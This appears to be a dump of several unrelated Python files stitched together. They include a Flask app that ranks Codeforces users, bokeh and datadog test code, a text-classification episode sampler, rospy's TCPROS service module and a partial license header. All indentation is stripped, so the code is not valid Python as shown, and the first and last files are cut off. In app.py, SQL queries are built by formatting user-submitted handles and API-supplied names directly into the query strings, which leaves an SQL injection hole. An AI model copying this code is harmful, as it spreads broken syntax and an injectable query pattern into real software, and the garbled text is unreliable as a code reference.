This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
'''
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, 'object_cls')
self.require_object = check.bool_param(require_object, 'require_object')
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
'self.object',
self.object_cls,
'generator never yielded object of type {}'.format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed('Called `get_object` before `generate_setup_events`')
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
def git_repository_root():
return six.ensure_str(subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip())
|
app.py
|
import requests,schedule,sqlite3,json
from operator import itemgetter
from flask import Flask,render_template,session,request,redirect,url_for,flash
import os
import multiprocessing
import time
app = Flask(__name__)
cursor = sqlite3.connect('ranklist.db',check_same_thread=False)
cursor2 = sqlite3.connect('ranklist.db',check_same_thread=False)
cursor.execute('''
CREATE TABLE IF NOT EXISTS handles(
handle varchar(100) PRIMARY KEY,
solved int
);
''')
cursor.execute('''
CREATE TABLE IF NOT EXISTS problems(
name varchar(100) PRIMARY KEY,
link varchar(1000),
solved int,
level varchar(2)
);
''')
@app.route("/new_here")
def new_here():
return render_template('add_handle.html')
@app.route("/add_handle",methods = ['GET','POST'])
def add():
if request.method == 'POST':
url = "https://codeforces.com/api/user.status?handle=%s" %(request.form['handle'])
req = requests.get(url)
jobj = json.loads(req.text)
error = False
duplicate = False
if jobj['status'] != "OK":
error = True
else:
qry = "select * from handles where handle = '%s'" %(request.form['handle'])
tmp = cursor.execute(qry)
if tmp.fetchone() == None:
cursor.execute('''insert into handles values (?,?)''',(request.form['handle'],0))
else:
duplicate = True
cursor.commit()
return render_template('add_handle.html',error=error,duplicate=duplicate)
return home()
def update():
print("updating")
pset = []
tmp3 = cursor.execute('''Select * from problems''')
while True:
pname = tmp3.fetchone()
if pname == None:
break
pset.append(pname[0])
#print(pset)
tmp = cursor.execute('''SELECT * from handles''')
while True:
handle = tmp.fetchone()
if handle == None:
break
#print("updating %s" %(handle[0]))
cursor2.execute('''update handles set solved = 0 where handle = '%s' '''%(handle[0]))
tmp = cursor.execute('''Select * from problems''')
while True:
problem = tmp.fetchone()
if problem == None:
break
cursor2.execute('''update problems set solved = 0 where name = '%s'; ''' %(problem[0]))
tmp = cursor.execute('''SELECT handle from handles''')
while True:
handle = tmp.fetchone()
probstatus = dict()
if handle == None:
break
try:
url = "https://codeforces.com/api/user.status?handle=%s" %(handle[0])
sub1 = requests.get(url)
sub = json.loads(sub1.text)
if sub['status'] != "OK":
continue
for stat in sub['result']:
if stat['verdict'] == "OK":
probstatus[stat['problem']['name']] = True
for x in probstatus:
if probstatus[x] == True and x in pset:
#print(x)
qry = '''select * from problems where name = "%s" ''' %(x)
tmp2 = cursor2.execute(qry)
if tmp2.fetchone() != None:
try:
qry = '''update handles set solved = solved+1 where handle = "%s" ''' %(handle[0])
cursor2.execute(qry)
except:
print("not possible here")
try:
qry = '''update problems set solved = solved+1 where name = "%s" ''' %(x)
cursor2.execute(qry)
except:
print("not possible here")
print("done %s" %(handle))
except:
print("skipping %s" %(handle))
cursor.commit()
cursor2.commit()
print("done update")
# return render_template('home.html')
def test():
print("hi")
@app.route("/")
def home():
ranks = []
tmp = cursor.execute('''select * from handles order by solved desc''')
while True:
handle = tmp.fetchone()
if handle==None:
break
ranks.append((handle[0],handle[1]))
return render_template('home.html',ranklist=ranks)
@app.route("/problems")
def problems():
psolves = []
tmp = cursor.execute('''select * from problems order by solved desc''')
while True:
problem = tmp.fetchone()
if problem == None:
break
psolves.append((problem))
return render_template('problems.html',pdata = psolves)
#add dynamic search
def work():
try:
update()
except:
print("update not possible")
schedule.every(10).minutes.do(work)
def run_loop():
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
p = multiprocessing.Process(target=run_loop)
p.start()
app.run(port=os.environ.get("PORT",5000), host='0.0.0.0')
|
test_utils.py
|
import uuid
import tempfile
import threading
import time
import unittest
#import redis
import requests
from requests.exceptions import ConnectionError
from tornado import ioloop
#import zmq
from bokeh.tests.test_utils import skipIfPy3
from ..models import user
from .. import start, configure
from ..app import bokeh_app
from ..settings import settings as server_settings
def wait_flask():
def helper():
try:
return requests.get('http://localhost:5006/bokeh/ping')
except ConnectionError:
return False
return wait_until(helper)
def wait_redis_gone(port):
def helper():
client = redis.Redis(port=port)
try:
client.ping()
return False
except redis.ConnectionError:
return True
return wait_until(helper)
def wait_redis_start(port):
def helper():
client = redis.Redis(port=port)
try:
return client.ping()
except redis.ConnectionError:
pass
return wait_until(helper)
def wait_until(func, timeout=1.0, interval=0.01):
st = time.time()
while True:
if func():
return True
if (time.time() - st) > timeout:
return False
time.sleep(interval)
def recv_timeout(socket, timeout):
poll = zmq.Poller()
poll.register(socket, zmq.POLLIN)
socks = dict(poll.poll(timeout=timeout))
if socks.get(socket, None) == zmq.POLLIN:
return socket.recv_multipart()
else:
return None
class BaseBokehServerTestCase(unittest.TestCase):
options = {}
class MemoryBokehServerTestCase(BaseBokehServerTestCase):
@skipIfPy3("gevent does not work in py3.")
def setUp(self):
#clear tornado ioloop instance
server_settings.model_backend = {'type' : 'memory'}
for k,v in self.options.items():
setattr(server_settings, k, v)
bokeh_app.stdout = None
bokeh_app.stderr = None
self.serverthread = threading.Thread(target=start.start_simple_server)
self.serverthread.start()
wait_flask()
#not great - but no good way to wait for zmq to come up
time.sleep(0.1)
make_default_user(bokeh_app)
def tearDown(self):
start.stop()
self.serverthread.join()
BokehServerTestCase = MemoryBokehServerTestCase
def make_default_user(bokeh_app):
bokehuser = user.new_user(bokeh_app.servermodel_storage, "defaultuser",
str(uuid.uuid4()), apikey='nokey', docs=[])
return bokehuser
|
parallel_sampler_orig.py
|
import time
import datetime
from multiprocessing import Process, Queue, cpu_count
import torch
import numpy as np
# from pytorch_transformers import BertModel
from transformers import BertModel
from . import utils
from . import stats
class ParallelSampler():
def __init__(self, data, args, num_episodes=None):
self.data = data
self.args = args
self.num_episodes = num_episodes
self.all_classes = np.unique(self.data['label'])
self.num_classes = len(self.all_classes)
if self.num_classes < self.args.way:
raise ValueError("Total number of classes is less than #way.")
self.idx_list = []
for y in self.all_classes:
self.idx_list.append(
np.squeeze(np.argwhere(self.data['label'] == y)))
self.count = 0
self.done_queue = Queue()
self.num_cores = cpu_count() if args.n_workers is 0 else args.n_workers
self.p_list = []
for i in range(self.num_cores):
self.p_list.append(
Process(target=self.worker, args=(self.done_queue,)))
for i in range(self.num_cores):
self.p_list[i].start()
def get_epoch(self):
for _ in range(self.num_episodes):
# wait until self.thread finishes
support, query = self.done_queue.get()
# convert to torch.tensor
support = utils.to_tensor(support, self.args.cuda, ['raw'])
query = utils.to_tensor(query, self.args.cuda, ['raw'])
if self.args.meta_w_target:
if self.args.meta_target_entropy:
w = stats.get_w_target(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
else: # use rr approxmation (this one is faster)
w = stats.get_w_target_rr(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
support['w_target'] = w.detach()
query['w_target'] = w.detach()
support['is_support'] = True
query['is_support'] = False
yield support, query
def worker(self, done_queue):
'''
Generate one task (support and query).
Store into self.support[self.cur] and self.query[self.cur]
'''
while True:
if done_queue.qsize() > 100:
time.sleep(1)
continue
# sample ways
sampled_classes = np.random.permutation(
self.num_classes)[:self.args.way]
source_classes = []
for j in range(self.num_classes):
if j not in sampled_classes:
source_classes.append(self.all_classes[j])
source_classes = sorted(source_classes)
# sample examples
support_idx, query_idx = [], []
for y in sampled_classes:
tmp = np.random.permutation(len(self.idx_list[y]))
support_idx.append(
self.idx_list[y][tmp[:self.args.shot]])
query_idx.append(
self.idx_list[y][
tmp[self.args.shot:self.args.shot+self.args.query]])
support_idx = np.concatenate(support_idx)
query_idx = np.concatenate(query_idx)
if self.args.mode == 'finetune' and len(query_idx) == 0:
query_idx = support_idx
# aggregate examples
max_support_len = np.max(self.data['text_len'][support_idx])
max_query_len = np.max(self.data['text_len'][query_idx])
support = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
support_idx, max_support_len)
query = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
query_idx, max_query_len)
if self.args.embedding in ['idf', 'meta', 'meta_mlp']:
# compute inverse document frequency over the meta-train set
idf = stats.get_idf(self.data, source_classes)
support['idf'] = idf
query['idf'] = idf
if self.args.embedding in ['iwf', 'meta', 'meta_mlp']:
# compute SIF over the meta-train set
iwf = stats.get_iwf(self.data, source_classes)
support['iwf'] = iwf
query['iwf'] = iwf
if 'pos' in self.args.auxiliary:
support = utils.select_subset(
self.data, support, ['head', 'tail'], support_idx)
query = utils.select_subset(
self.data, query, ['head', 'tail'], query_idx)
done_queue.put((support, query))
def __del__(self):
'''
Need to terminate the processes when deleting the object
'''
for i in range(self.num_cores):
self.p_list[i].terminate()
del self.done_queue
|
tcpros_service.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Internal use: Service-specific extensions for TCPROS support"""
import io
import socket
import struct
import sys
import logging
import time
import traceback
import genpy
import rosgraph
import rosgraph.names
import rosgraph.network
from rospy.exceptions import TransportInitError, TransportTerminated, ROSException, ROSInterruptException
from rospy.service import _Service, ServiceException
from rospy.impl.registration import get_service_manager
from rospy.impl.tcpros_base import TCPROSTransport, TCPROSTransportProtocol, \
get_tcpros_server_address, start_tcpros_server, recv_buff, \
DEFAULT_BUFF_SIZE
from rospy.core import logwarn, loginfo, logerr, logdebug
import rospy.core
import rospy.msg
import rospy.names
import rospy.impl.validators
import threading
if sys.hexversion > 0x03000000: #Python3
def isstring(s):
return isinstance(s, str) #Python 3.x
else:
def isstring(s):
return isinstance(s, basestring) #Python 2.x
logger = logging.getLogger('rospy.service')
#########################################################
# Service helpers
def wait_for_service(service, timeout=None):
"""
Blocks until service is available. Use this in
initialization code if your program depends on a
service already running.
@param service: name of service
@type service: str
@param timeout: timeout time in seconds, None for no
timeout. NOTE: timeout=0 is invalid as wait_for_service actually
contacts the service, so non-blocking behavior is not
possible. For timeout=0 uses cases, just call the service without
waiting.
@type timeout: double
@raise ROSException: if specified timeout is exceeded
@raise ROSInterruptException: if shutdown interrupts wait
"""
master = rosgraph.Master(rospy.names.get_caller_id())
def contact_service(resolved_name, timeout=10.0):
try:
uri = master.lookupService(resolved_name)
except rosgraph.MasterException:
return False
addr = rospy.core.parse_rosrpc_uri(uri)
if rosgraph.network.use_ipv6():
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# we always want to timeout just in case we're connecting
# to a down service.
s.settimeout(timeout)
logdebug('connecting to ' + str(addr))
s.connect(addr)
h = { 'probe' : '1', 'md5sum' : '*',
'callerid' : rospy.core.get_caller_id(),
'service': resolved_name }
rosgraph.network.write_ros_handshake_header(s, h)
return True
finally:
if s is not None:
s.close()
if timeout == 0.:
raise ValueError("timeout must be non-zero")
resolved_name = rospy.names.resolve_name(service)
first = False
if timeout:
timeout_t = time.time() + timeout
while not rospy.core.is_shutdown() and time.time() < timeout_t:
try:
if contact_service(resolved_name, timeout_t-time.time()):
return
time.sleep(0.3)
except KeyboardInterrupt:
# re-raise
rospy.core.logdebug("wait_for_service: received keyboard interrupt, assuming signals disabled and re-raising")
raise
except: # service not actually up
if first:
first = False
rospy.core.logerr("wait_for_service(%s): failed to contact [%s], will keep trying"%(resolved_name, uri))
if rospy.core.is_shutdown():
raise ROSInterruptException("rospy shutdown")
else:
raise ROSException("timeout exceeded while waiting for service %s"%resolved_name)
else:
while not rospy.core.is_shutdown():
try:
if contact_service(resolved_name):
return
time.sleep(0.3)
except KeyboardInterrupt:
# re-raise
rospy.core.logdebug("wait_for_service: received keyboard interrupt, assuming signals disabled and re-raising")
raise
except: # service not actually up
if first:
first = False
rospy.core.logerr("wait_for_service(%s): failed to contact [%s], will keep trying"%(resolved_name, uri))
if rospy.core.is_shutdown():
raise ROSInterruptException("rospy shutdown")
def convert_return_to_response(response, response_class):
"""
Convert return value of function to response instance. The
rules/precedence for this are:
1. If the return type is the same as the response type, no conversion
is done.
2. If the return type is a dictionary, it is used as a keyword-style
initialization for a new response instance.
3. If the return type is *not* a list type, it is passed in as a single arg
to a new response instance.
4. If the return type is a list/tuple type, it is used as a args-style
initialization for a new response instance.
"""
# use this declared ROS type check instead of a direct instance
# check, which allows us to play tricks with serialization and
# deserialization
if isinstance(response, genpy.Message) and response._type == response_class._type:
#if isinstance(response, response_class):
return response
elif type(response) == dict:
# kwds response
try:
return response_class(**response)
except AttributeError as e:
raise ServiceException("handler returned invalid value: %s"%str(e))
elif response == None:
raise ServiceException("service handler returned None")
elif type(response) not in [list, tuple]:
# single, non-list arg
try:
return response_class(response)
except TypeError as e:
raise ServiceException("handler returned invalid value: %s"%str(e))
else:
# user returned a list, which has some ambiguous cases. Our resolution is that
# all list/tuples are converted to *args
try:
return response_class(*response)
except TypeError as e:
raise ServiceException("handler returned wrong number of values: %s"%str(e))
def service_connection_handler(sock, client_addr, header):
"""
Process incoming service connection. For use with
TCPROSServer. Reads in service name from handshake and creates the
appropriate service handler for the connection.
@param sock: socket connection
@type sock: socket
@param client_addr: client address
@type client_addr: (str, int)
@param header: key/value pairs from handshake header
@type header: dict
@return: error string or None
@rtype: str
"""
for required in ['service', 'md5sum', 'callerid']:
if not required in header:
return "Missing required '%s' field"%required
else:
logger.debug("connection from %s:%s", client_addr[0], client_addr[1])
service_name = header['service']
#TODO: make service manager configurable. I think the right
#thing to do is to make these singletons private members of a
#Node instance and enable rospy to have multiple node
#instances.
sm = get_service_manager()
md5sum = header['md5sum']
service = sm.get_service(service_name)
if not service:
return "[%s] is not a provider of [%s]"%(rospy.names.get_caller_id(), service_name)
elif md5sum != rospy.names.SERVICE_ANYTYPE and md5sum != service.service_class._md5sum:
return "request from [%s]: md5sums do not match: [%s] vs. [%s]"%(header['callerid'], md5sum, service.service_class._md5sum)
else:
transport = TCPROSTransport(service.protocol, service_name, header=header)
transport.set_socket(sock, header['callerid'])
transport.write_header()
# using threadpool reduced performance by an order of
# magnitude, need to investigate better
t = threading.Thread(target=service.handle, args=(transport, header))
t.setDaemon(True)
t.start()
class TCPService(TCPROSTransportProtocol):
"""
Protocol implementation for Services over TCPROS
"""
def __init__(self, resolved_name, service_class, buff_size=DEFAULT_BUFF_SIZE):
"""
ctor.
@param resolved_name: name of service
@type resolved_name: str
@param service_class: Service data type class
@type service_class: Service
@param buff_size int: size of buffer (bytes) to use for reading incoming requests.
@type buff_size: int
"""
super(TCPService, self).__init__(resolved_name, service_class._request_class, buff_size=buff_size)
self.service_class = service_class
def get_header_fields(self):
"""
Protocol API
@return: header fields
@rtype: dict
"""
return {'service': self.resolved_name, 'type': self.service_class._type,
'md5sum': self.service_class._md5sum, 'callerid': rospy.names.get_caller_id() }
class TCPROSServiceClient(TCPROSTransportProtocol):
"""Protocol Implementation for Service clients over TCPROS"""
def __init__(self, resolved_name, service_class, headers=None, buff_size=DEFAULT_BUFF_SIZE):
"""
ctor.
@param resolved_name: resolved service name
@type resolved_name: str
@param service_class: Service data type class
@type service_class: Service
@param headers: identifier for Service session
@type headers: dict
@param buff_size: size of buffer (bytes) for reading responses from Service.
@type buff_size: int
"""
super(TCPROSServiceClient, self).__init__(resolved_name, service_class._response_class)
self.service_class = service_class
self.headers = headers or {}
self.buff_size = buff_size
def get_header_fields(self):
"""
TCPROSTransportProtocol API
"""
headers = {'service': self.resolved_name, 'md5sum': self.service_class._md5sum,
'callerid': rospy.names.get_caller_id()}
# The current implementation allows user-supplied headers to
# override protocol-specific headers. We may want to
# eliminate this in the future if it is abused too severely.
for k, v in self.headers.items():
headers[k] = v
return headers
def _read_ok_byte(self, b, sock):
"""
Utility for reading the OK-byte/error-message header preceding each message.
@param sock: socket connection. Will be read from if OK byte is
false and error message needs to be read
@type sock: socket.socket
@param b: buffer to read from
@type b: StringIO
"""
if b.tell() == 0:
return
pos = b.tell()
b.seek(0)
ok = struct.unpack('<B', b.read(1))[0] # read in ok byte
b.seek(pos)
if not ok:
str = self._read_service_error(sock, b)
#_read_ok_byte has to reset state of the buffer to
#consumed as this exception will bypass rest of
#deserialized_messages logic. we currently can't have
#multiple requests in flight, so we can keep this simple
b.seek(0)
b.truncate(0)
raise ServiceException("service [%s] responded with an error: %s"%(self.resolved_name, str))
else:
# success, set seek point to start of message
b.seek(pos)
def read_messages(self, b, msg_queue, sock):
"""
In service implementation, reads in OK byte that preceeds each
response. The OK byte allows for the passing of error messages
instead of a response message
@param b: buffer
@type b: StringIO
@param msg_queue: Message queue to append to
@type msg_queue: [Message]
@param sock: socket to read from
@type sock: socket.socket
"""
self._read_ok_byte(b, sock)
rospy.msg.deserialize_messages(b, msg_queue, self.recv_data_class, queue_size=self.queue_size, max_msgs=1, start=1) #rospy.msg
#deserialize_messages only resets the buffer to the start
#point if everything was consumed, so we have to further reset
#it.
if b.tell() == 1:
b.seek(0)
def _read_service_error(self, sock, b):
"""
Read service error from sock
@param sock: socket to read from
@type sock: socket
@param b: currently read data from sock
@type b: StringIO
"""
buff_size = 256 #can be small given that we are just reading an error string
while b.tell() < 5:
recv_buff(sock, b, buff_size)
bval = b.getvalue()
(length,) = struct.unpack('<I', bval[1:5]) # ready in len byte
while b.tell() < (5 + length):
recv_buff(sock, b, buff_size)
bval = b.getvalue()
return struct.unpack('<%ss'%length, bval[5:5+length])[0] # ready in len byte
class ServiceProxy(_Service):
"""
Create a handle to a ROS service for invoking calls.
Usage::
add_two_ints = ServiceProxy('add_two_ints', AddTwoInts)
resp = add_two_ints(1, 2)
"""
def __init__(self, name, service_class, persistent=False, headers=None):
"""
ctor.
@param name: name of service to call
@type name: str
@param service_class: auto-generated service class
@type service_class: Service class
@param persistent: (optional) if True, proxy maintains a persistent
connection to service. While this results in better call
performance, persistent connections are discouraged as they are
less resistent to network issues and service restarts.
@type persistent: bool
@param headers: (optional) arbitrary headers
@type headers: dict
"""
super(ServiceProxy, self).__init__(name, service_class)
self.uri = None
self.seq = 0
self.buff_size = DEFAULT_BUFF_SIZE
self.persistent = persistent
if persistent:
if not headers:
headers = {}
headers['persistent'] = '1'
self.protocol = TCPROSServiceClient(self.resolved_name,
self.service_class, headers=headers)
self.transport = None #for saving persistent connections
def wait_for_service(self, timeout=None):
wait_for_service(self.resolved_name, timeout=timeout)
# #425
def __call__(self, *args, **kwds):
"""
Callable-style version of the service API. This accepts either a request message instance,
or you can call directly with arguments to create a new request instance. e.g.::
add_two_ints(AddTwoIntsRequest(1, 2))
add_two_ints(1, 2)
add_two_ints(a=1, b=2)
@param args: arguments to remote service
@param kwds: message keyword arguments
@raise ROSSerializationException: If unable to serialize
message. This is usually a type error with one of the fields.
"""
return self.call(*args, **kwds)
def _get_service_uri(self, request):
"""
private routine for getting URI of service to call
@param request: request message
@type request: L{rospy.Message}
"""
if not isinstance(request, genpy.Message):
raise TypeError("request object is not a valid request message instance")
# in order to support more interesting overrides, we only
# check that it declares the same ROS type instead of a
# stricter class check
#if not self.request_class == request.__class__:
if not self.request_class._type == request._type:
raise TypeError("request object type [%s] does not match service type [%s]"%(request.__class__, self.request_class))
#TODO: subscribe to service changes
#if self.uri is None:
if 1: #always do lookup for now, in the future we need to optimize
try:
try:
master = rosgraph.Master(rospy.names.get_caller_id())
self.uri = master.lookupService(self.resolved_name)
except socket.error:
raise ServiceException("unable to contact master")
except rosgraph.MasterError as e:
logger.error("[%s]: lookup service failed with message [%s]", self.resolved_name, str(e))
raise ServiceException("service [%s] unavailable"%self.resolved_name)
# validate
try:
rospy.core.parse_rosrpc_uri(self.uri)
except rospy.impl.validators.ParameterInvalid:
raise ServiceException("master returned invalid ROSRPC URI: %s"%self.uri)
except socket.error as e:
logger.error("[%s]: socket error contacting service, master is probably unavailable",self.resolved_name)
return self.uri
def call(self, *args, **kwds):
"""
Call the service. This accepts either a request message instance,
or you can call directly with arguments to create a new request instance. e.g.::
add_two_ints(AddTwoIntsRequest(1, 2))
add_two_ints(1, 2)
add_two_ints(a=1, b=2)
@raise TypeError: if request is not of the valid type (Message)
@raise ServiceException: if communication with remote service fails
@raise ROSInterruptException: if node shutdown (e.g. ctrl-C) interrupts service call
@raise ROSSerializationException: If unable to serialize
message. This is usually a type error with one of the fields.
"""
# convert args/kwds to request message class
request = rospy.msg.args_kwds_to_message(self.request_class, args, kwds)
# initialize transport
if self.transport is None:
service_uri = self._get_service_uri(request)
dest_addr, dest_port = rospy.core.parse_rosrpc_uri(service_uri)
# connect to service
transport = TCPROSTransport(self.protocol, self.resolved_name)
transport.buff_size = self.buff_size
try:
transport.connect(dest_addr, dest_port, service_uri)
except TransportInitError as e:
# can be a connection or md5sum mismatch
raise ServiceException("unable to connect to service: %s"%e)
self.transport = transport
else:
transport = self.transport
# send the actual request message
self.seq += 1
transport.send_message(request, self.seq)
try:
responses = transport.receive_once()
if len(responses) == 0:
raise ServiceException("service [%s] returned no response"%self.resolved_name)
elif len(responses) > 1:
raise ServiceException("service [%s] returned multiple responses: %s"%(self.resolved_name, len(responses)))
except rospy.exceptions.TransportException as e:
# convert lower-level exception to exposed type
if rospy.core.is_shutdown():
raise rospy.exceptions.ROSInterruptException("node shutdown interrupted service call")
else:
raise ServiceException("transport error completing service call: %s"%(str(e)))
finally:
if not self.persistent:
transport.close()
self.transport = None
return responses[0]
def close(self):
"""Close this ServiceProxy. This only has an effect on persistent ServiceProxy instances."""
if self.transport is not None:
self.transport.close()
class ServiceImpl(_Service):
"""
Implementation of ROS Service. This intermediary class allows for more configuration of behavior than the Service class.
"""
def __init__(self, name, service_class, handler, buff_size=DEFAULT_BUFF_SIZE):
super(ServiceImpl, self).__init__(name, service_class)
if not name or not isstring(name):
raise ValueError("service name is not a non-empty string")
# #2202
if not rosgraph.names.is_legal_name(name):
import warnings
warnings.warn("'%s' is not a legal ROS graph resource name. This may cause problems with other ROS tools"%name, stacklevel=2)
self.handler = handler
self.registered = False
self.seq = 0
self.done = False
self.buff_size=buff_size
start_tcpros_server() #lazy-init the tcprosserver
host, port = get_tcpros_server_address()
self.uri = '%s%s:%s'%(rospy.core.ROSRPC, host, port)
logdebug("... service URL is %s"%self.uri)
self.protocol = TCPService(self.resolved_name, service_class, self.buff_size)
logdebug("[%s]: new Service instance"%self.resolved_name)
# TODO: should consider renaming to unregister
def shutdown(self, reason=''):
"""
Stop this service
@param reason: human-readable shutdown reason
@type reason: str
"""
self.done = True
logdebug('[%s].shutdown: reason [%s]'%(self.resolved_name, reason))
try:
#TODO: make service manager configurable
get_service_manager().unregister(self.resolved_name, self)
except Exception as e:
logerr("Unable to unregister with master: "+traceback.format_exc())
raise ServiceException("Unable to connect to master: %s"%e)
def spin(self):
"""
Let service run and take over thread until service or node
shutdown. Use this method to keep your scripts from exiting
execution.
"""
try:
while not rospy.core.is_shutdown() and not self.done:
time.sleep(0.5)
except KeyboardInterrupt:
logdebug("keyboard interrupt, shutting down")
def _write_service_error(self, transport, err_msg):
"""
Send error message to client
@param transport: transport connection to client
@type transport: Transport
@param err_msg: error message to send to client
@type err_msg: str
"""
transport.write_data(struct.pack('<BI%ss'%len(err_msg), 0, len(err_msg), err_msg))
def _handle_request(self, transport, request):
"""
Process a single incoming request.
@param transport: transport instance
@type transport: L{TCPROSTransport}
@param request: Message
@type request: genpy.Message
"""
try:
# convert return type to response Message instance
response = convert_return_to_response(self.handler(request), self.response_class)
self.seq += 1
# ok byte
transport.write_buff.write(struct.pack('<B', 1))
transport.send_message(response, self.seq)
except ServiceException as e:
rospy.core.rospydebug("handler raised ServiceException: %s"%(e))
self._write_service_error(transport, "service cannot process request: %s"%e)
except Exception as e:
logerr("Error processing request: %s\n%s"%(e,traceback.print_exc()))
self._write_service_error(transport, "error processing request: %s"%e)
def handle(self, transport, header):
"""
Process incoming request. This method should be run in its
own thread. If header['persistent'] is set to 1, method will
block until connection is broken.
@param transport: transport instance
@type transport: L{TCPROSTransport}
@param header: headers from client
@type header: dict
"""
if 'persistent' in header and \
header['persistent'].lower() in ['1', 'true']:
persistent = True
else:
persistent = False
if header.get('probe', None) == '1':
#this will likely do more in the future
transport.close()
return
handle_done = False
while not handle_done:
try:
requests = transport.receive_once()
for request in requests:
self._handle_request(transport, request)
if not persistent:
handle_done = True
except rospy.exceptions.TransportTerminated as e:
if not persistent:
logerr("incoming connection failed: %s"%e)
logdebug("service[%s]: transport terminated"%self.resolved_name)
handle_done = True
transport.close()
class Service(ServiceImpl):
"""
Declare a ROS service. Service requests are passed to the
specified handler.
Service Usage::
s = Service('getmapservice', GetMap, get_map_handler)
"""
def __init__(self, name, service_class, handler, buff_size=DEFAULT_BUFF_SIZE):
"""
ctor.
@param name: service name, ``str``
@param service_class: Service definition class
@param handler: callback function for processing service
request. Function takes in a ServiceRequest and returns a
ServiceResponse of the appropriate type. Function may also
return a list, tuple, or dictionary with arguments to initialize
a ServiceResponse instance of the correct type.
If handler cannot process request, it may either return None,
to indicate failure, or it may raise a rospy.ServiceException
to send a specific error message to the client. Returning None
is always considered a failure.
@type handler: fn(req)->resp
@param buff_size: size of buffer for reading incoming requests. Should be at least size of request message
@type buff_size: int
"""
super(Service, self).__init__(name, service_class, handler, buff_size)
#TODO: make service manager configurable
get_service_manager().register(self.resolved_name, self)
|
test_threadstats_thread_safety.py
|
import re
import time
import threading
from datadog import ThreadStats
class MemoryReporter(object):
""" A reporting class that reports to memory for testing. """
def __init__(self):
self.metrics = []
self.events = []
def flush_metrics(self, metrics):
self.metrics += metrics
def flush_events(self, events):
self.events += events
class ThreadStatsTest(ThreadStats):
def send_metrics_and_event(self, id):
# Counter
self.increment("counter", timestamp=12345)
time.sleep(0.001) # sleep makes the os continue another thread
# Gauge
self.gauge("gauge_" + str(id), 42)
time.sleep(0.001) # sleep makes the os continue another thread
# Histogram
self.histogram("histogram", id, timestamp=12345)
time.sleep(0.001) # sleep makes the os continue another thread
# Event
self.event("title", "content")
class TestThreadStatsThreadSafety(object):
def test_threadstats_thread_safety(self):
stats = ThreadStatsTest()
stats.start(roll_up_interval=10, flush_in_thread=False)
reporter = stats.reporter = MemoryReporter()
for i in range(10000):
threading.Thread(target=stats.send_metrics_and_event, args=[i]).start()
# Wait all threads to finish
time.sleep(10)
# Flush and check
stats.flush()
metrics = reporter.metrics
events = reporter.events
# Overview
assert len(metrics) == 10009
# Sort metrics
counter_metrics = []
gauge_metrics = []
histogram_metrics = []
for m in metrics:
if re.match("gauge_.*", m['metric']):
gauge_metrics.append(m)
elif re.match("histogram.*", m['metric']):
histogram_metrics.append(m)
else:
counter_metrics.append(m)
# Counter
assert len(counter_metrics) == 1
counter = counter_metrics[0]
assert counter['points'][0][1] == 10000
# Gauge
assert len(gauge_metrics) == 10000
# Histogram
assert len(histogram_metrics) == 8
count_histogram = filter(lambda x: x['metric'] == "histogram.count", histogram_metrics)[0]
assert count_histogram['points'][0][1] == 10000
sum_histogram = filter(lambda x: x['metric'] == "histogram.avg", histogram_metrics)[0]
assert sum_histogram['points'][0][1] == 4999.5
# Events
assert 10000 == len(events)
|
base_historian.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2015, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
